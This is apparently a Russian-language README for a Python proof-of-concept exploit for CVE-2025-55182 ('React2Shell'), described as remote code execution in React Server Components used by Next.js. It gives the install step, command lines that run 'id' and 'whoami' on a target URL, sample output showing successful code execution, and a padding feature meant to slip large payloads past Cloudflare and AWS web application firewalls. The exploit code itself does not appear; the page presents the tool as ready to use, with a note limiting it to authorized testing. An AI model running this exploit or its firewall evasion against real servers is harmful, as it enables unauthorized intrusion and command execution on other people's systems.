
Python PoC для CVE-2025-55182 (React2Shell) RCE в Next.js/React Server Components с динамическим обходом WAF (padding) для авторизованного тестирования безопасности.
Чистый, надежный Python proof-of-concept эксплойт для CVE-2025-55182 (также известный как React2Shell), критической уязвимости удаленного выполнения кода в React Server Components, используемых Next.js (App Router) и аналогичными фреймворками.
Этот PoC включает динамическую WAF bypass padding для обхода распространенных веб-приложений файрволов (Cloudflare, AWS WAF и т.д.), которые ограничивают глубокую проверку больших multipart тел.
requestspip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
Этот инструмент предназначен только для авторизованного тестирования безопасности и исследований.